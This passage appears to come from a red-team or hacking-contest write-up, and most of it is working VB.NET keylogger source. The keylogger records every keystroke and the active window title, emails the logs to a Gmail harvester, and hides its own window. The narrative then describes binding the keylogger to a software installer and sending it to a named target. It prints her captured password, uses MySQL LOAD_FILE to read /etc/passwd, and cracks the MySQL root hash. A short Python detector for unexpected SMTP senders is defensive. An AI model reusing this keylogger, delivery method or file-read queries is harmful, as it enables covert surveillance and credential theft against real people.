End If 
If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or 
(CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "z" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D1) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "1" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "!" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D2) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "2" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "@" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D3)
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "3" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "#" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D4) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "4" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "$" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D5) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "5" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "%" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D6) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then
txtNishikieKeys.Text = txtNishikieKeys.Text & "6" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "^" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D7) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "7" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "&" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D8) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "8" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "*" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D9) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "9"
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "(" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D0) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "0" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & ")" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Back) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[backspace]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Tab) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[tab]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Return) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & vbCrLf 
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ShiftKey) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[shift]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[ctrl]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Menu) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[alt]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Pause) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[pause]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Escape) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[esc]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Space) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & " " 
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.End) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[end]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Home) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[home]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Left) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[left]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Right) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[right]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Up) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[up]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Down) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[down]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Insert)
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[insert]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Delete) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[Delete]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBAS) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & ";" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & ":" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBBS) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "=" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "+" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBCS) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "," 
End If
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "<" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBDS) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "-" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "_" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBES) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "." 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & ">" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HBFS) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "/" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "?" 
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HC0S) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "`" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "~" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDBS) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDCS) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "|" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDDS) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "]"
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (&HDES) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "'" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & Chr(34) 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Multiply) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "*" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Divide) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "/" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Add) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "+" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Subtract)
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "-" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Decimal) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[Del]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F1) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F1]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F2) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F2]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F3) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F3]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F4) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F4]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F5) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F5]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F6) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F6]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F7) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F7]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F8) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F8]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F9) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F9]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F10) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F10]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F11) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F11]"
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F12) 
If Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[F12]" 
End If 
If Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S Then 
Me.Visible = True 
Call RegisterServiceProcess(0, 0) 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumLock) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[NumLock]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Scroll) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[ScrollLock]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.Print) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[PrintScreen]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageUp) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[PageUp]" 
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.PageDown) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[Pagedown]" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad1) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "1" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad2) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "2" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad3) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "3" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad4) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "4" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad5) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "5" 
End If
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad6) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "6" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad7) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "7" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad8) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "8" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad9) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "9" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.NumPad0) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "0" 
End If 
mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.ControlKey) 
If (mimiNiCapsAmaLa And &H1S) = &H1S Then 
txtNishikieKeys.Text = txtNishikieKeys.Text & "[Ctrl]" 
End If 
' this ends checking our keys for now
' next trap active window so that we can record and associate; do it in one of your timers, preferably
' with a short time frame.
Private Function GetActiveWindowTitle() As String 
Dim kiAppCurrent As String 
kiAppCurrent = New String(Chr(0), 100) 
GetWindowText(GetForegroundWindow, kiAppCurrent, 100) 
kiAppCurrent = kiAppCurrent.Substring(0, InStr(kiAppCurrent, Chr(0)) - 1) 
Return kiAppCurrent 
End Function 
' in timer 2 we add what we trap to the window we trapped it from
Dim strin As String = Nothing 
If strin <> GetActiveWindowTitle() Then 
txtNishikieKeys.Text = txtNishikieKeys.Text + vbNewLine & GetActiveWindowTitle() & 
vbNewLine 
strin = GetActiveWindowTitle() 
End If 
'
Dim MyMailMessage As New MailMessage() 
MyMailMessage.From = New MailAddress("theharvesteruon@gmail.com") 
MyMailMessage.To.Add("theharvesteruon@gmail.com") 
MyMailMessage.Subject = "Team 0wnErz " 
MyMailMessage.Body = txtNishikieKeys.Text 
Dim SMPT As New SmtpClient("smtp.gmail.com") 
SMPT.Port = 587 
SMPT.EnableSsl = True 
SMPT.Credentials = New System.Net.NetworkCredential("theharvesteruon@gmail.com", 
"<YouReallyExpectOurHarvesterPasswordToBeGivenHereSorry>") 
SMPT.Send(MyMailMessage) 
txtNishikieKeys.Text = "" 
' before we forget hide the app lol
Me.hide 
Me.opacity = 0 
Me.ShowInTaskbar = false
For those asking why no keyboard hooks and all the initialization: well, it's XP, no need for paranoia and
noise on a system, but here's something to calm you down if you don't like the tiresome but innocent
method above.
Private KeyboardHookProcedure As Win32.HookProc 
Public Sub InstallHooks() 
If hKeyboardHook = 0 Then ' install Keyboard hook 
KeyboardHookProcedure = New Win32.HookProc(AddressOf KeyboardHookProc) 
hKeyboardHook = Win32.SetWindowsHookEx( _ 
Win32.WH.WH_KEYBOARD_LL, _ 
KeyboardHookProcedure, _ 
Marshal.GetHINSTANCE(Reflection.Assembly.GetExecutingAssembly().GetModules( )(0)), _ 
0) 
If (hKeyboardHook = 0) Then 'SetWindowsHookEx failed 
RemoveHooks() 
Throw New Exception("SetWindowsHookEx failed.") 
End If 
End If 
End Sub 
Public Sub RemoveHooks() 
Dim keyboardResult As Boolean = True 
If hKeyboardHook <> 0 Then 
keyboardResult = Win32.UnhookWindowsHookEx(hKeyboardHook) 
hKeyboardHook = 0 
End If 
If Not keyboardResult Then 'UnhookWindowsHookEx failed 
Throw New Exception("UnhookWindowsHookEx failed.") 
End If 
End Sub
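Seen from the defender's side, the mail step above means a process that is not a mail client opens connections to smtp.gmail.com on port 587 from the workstation. The following Python check is an added example, not code from the walkthrough or its authors; the CSV layout, host names, file names, approved-client list and the fixed-interval heuristic are constructed assumptions.

```python
import csv
import io
import ntpath
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

SMTP_PORTS = {25, 465, 587}
# Assumptions: the mail clients sanctioned on these workstations and where they install.
APPROVED_MAILERS = {"thunderbird.exe", "outlook.exe"}
INSTALL_PREFIX = "c:\\program files\\"
USER_WRITABLE_HINTS = ("\\temp\\", "\\local settings\\", "\\application data\\")

R_NOT_MAILER = "not an approved mail client at its installed path"
R_WRITABLE = "image runs from a user-writable path"
R_PERIODIC = "connections at a fixed interval (timer-driven sender)"

# Constructed connection log (not taken from the walkthrough): one row per outbound connection.
SAMPLE_EVENTS = r"""timestamp,host,image,dest_host,dest_port
2014-03-18T12:20:05,WS-01,C:\Program Files\Mozilla Thunderbird\thunderbird.exe,smtp.gmail.com,587
2014-03-18T12:21:00,WS-01,C:\Documents and Settings\user\Local Settings\Temp\setup-helper.exe,smtp.gmail.com,587
2014-03-18T12:26:00,WS-01,C:\Documents and Settings\user\Local Settings\Temp\setup-helper.exe,smtp.gmail.com,587
2014-03-18T12:31:01,WS-01,C:\Documents and Settings\user\Local Settings\Temp\setup-helper.exe,smtp.gmail.com,587
2014-03-18T12:36:00,WS-01,C:\Documents and Settings\user\Local Settings\Temp\setup-helper.exe,smtp.gmail.com,587
2014-03-18T12:40:12,WS-01,C:\Program Files\Internet Explorer\iexplore.exe,www.example.com,443
2014-03-18T13:02:44,WS-02,C:\Program Files\Mozilla Thunderbird\thunderbird.exe,smtp.gmail.com,587
2014-03-18T13:05:10,WS-02,C:\Documents and Settings\user\Local Settings\Temp\thunderbird.exe,smtp.gmail.com,465
"""


def parse_events(text):
    """Parse the CSV log into dicts with typed timestamp and port fields."""
    events = []
    for row in csv.DictReader(io.StringIO(text.strip())):
        row["timestamp"] = datetime.fromisoformat(row["timestamp"])
        row["dest_port"] = int(row["dest_port"])
        events.append(row)
    return events


def is_approved_mailer(image):
    """A name match alone is spoofable, so the install path must match as well."""
    path = image.lower()
    return ntpath.basename(path) in APPROVED_MAILERS and path.startswith(INSTALL_PREFIX)


def is_periodic(times, max_cv=0.1):
    """True when at least four connections are spaced almost evenly (low variation)."""
    if len(times) < 4:
        return False
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    avg = mean(gaps)
    return avg > 0 and pstdev(gaps) / avg <= max_cv


def find_unexpected_smtp(events):
    """Group SMTP connections by (host, image) and report the non-mailer senders."""
    by_proc = defaultdict(list)
    for ev in events:
        if ev["dest_port"] in SMTP_PORTS and not is_approved_mailer(ev["image"]):
            by_proc[(ev["host"], ev["image"])].append(ev)

    findings = []
    for (host, image), evs in sorted(by_proc.items()):
        reasons = [R_NOT_MAILER]
        if any(hint in image.lower() for hint in USER_WRITABLE_HINTS):
            reasons.append(R_WRITABLE)
        if is_periodic([e["timestamp"] for e in evs]):
            reasons.append(R_PERIODIC)
        findings.append({
            "host": host,
            "image": image,
            "connections": len(evs),
            "ports": sorted({e["dest_port"] for e in evs}),
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for finding in find_unexpected_smtp(parse_events(SAMPLE_EVENTS)):
        print(finding["host"], finding["image"], finding["connections"], finding["reasons"])
```

The second finding in the sample is a binary named like a mail client but running from a Temp directory, which a name-only allowlist would miss.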
Also on the Hackbattle group they mentioned that the VPS was by Azanuru, and we
checked them out as we did the keylogger. We need as much as we can get as we
plan to own Joan.
So we visit the Azanuru site and guess what: open test day till the 20th. It was running on
Openstack and had 3 public IP subnets up and running, one on the same network as the
VPS running Nasty salon. Interesting. From phpinfo we saw an ubuntu install, so we
did a 13.10 as is the case on the blog's tutorial, and we join the subnet with the VPS
and get a floating IP of:
197.232.19.197
The Azanuru guys notice and send us a mail to join the .20 subnet one and kick our
floating IP out, but one thing we know is we are using a keypair to login and it has
sudo access, amazing ☺. So this (keypair) is what we will be targeting from Joan, not
other credentials.
So kick us out, but we know. Btw just a feel of how the droplet started failing:
2014-03-10 15:16:42,647 - url_helper.py[WARNING]: Calling 
2014-03-10 15:17:39,795 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [112/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by <class 'socket.error'>: [Errno 101] Network is unreachable)]
2014-03-10 15:17:46,809 - url_helper.py[WARNING]: Calling 'http://169.254.169.254/2009-04-04/meta-data/instance-id' failed [119/120s]: request error [HTTPConnectionPool(host='169.254.169.254', port=80): Max retries exceeded with url: /2009-04-04/meta-data/instance-id (Caused by <class 'socket.error'>: [Errno 101] Network is unreachable)]
2014-03-10 15:17:53,822 - DataSourceEc2.py[CRITICAL]: Giving up on md from ['http://169.254.169.254/2009-04-04/meta-data/instance-id'] after 126 seconds
2014-03-10 15:17:53,826 - util.py[WARNING]: Getting data from <class 'cloudinit.sources.DataSourceCloudStack.DataSourceCloudStack'> failed
Cloud-init v. 0.7.3 running 'modules:config' at Mon, 10 Mar 2014 15:17:54 +0000. Up 262.78 seconds.
* Starting AppArmor profiles [80G Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
So we finish our keylogger in 2 versions and use easy binder to bind them to
simfatic forms, 2 versions btw, and we upload them to our spa site and send the
mail to Joan:
http://spa.oo3.co/soft/Simfatic
Simfatic-setup-4.exe
http://spa.oo3.co/soft/simfatic
/simfatic-setup-2.exe
The version of the software we bound was meant to give an error message, to give
leeway in case of a problem to talk to her and send a second keylogger using a
different method of logging in order to make it successful in case the first fails.
Immediately she installed it, logs started coming in to our harvester and we got
good things:
But the keylogger never failed us so here we are: Confirmed XP was right. 
So we got this password as she typed her Gmail password:
Tuesday, March 18, 2014 [12:23 PM] thunderbird.exe: Mail Server Password Required
n@stys4l0nw3b
Time to login to the Gmail and see how much we can get. I think the pictures will
speak for us here:
So phpMyAdmin points to a db on .195.
SSH keypair to login to the server
Database Credentials
Successful Login 
In here we found passwords to both emails in the emails database but we were 
checking stuff out still before just using our keypair. So we created a database 
0wnErz: 
We made a table redteam with 2 columns id and data. We filled them with dummy 
data then on update we pulled files. 
UPDATE redteam SET Data=LOAD_FILE('/etc/hosts')
WHERE id=3;
UPDATE redteam SET Data=LOAD_FILE('/etc/passwd')
WHERE id=4;
For lulz while at it we cracked the mysql root hash. Despite the firewall this was a
weak password policy on their end:
root@localhost: 7561F5295A1A35CB8E0A7C46921994D383947FA5 MySQL4.1+: sha1(sha1_bin()) r00t
This happened very fast ☺
The race to the finish line began here
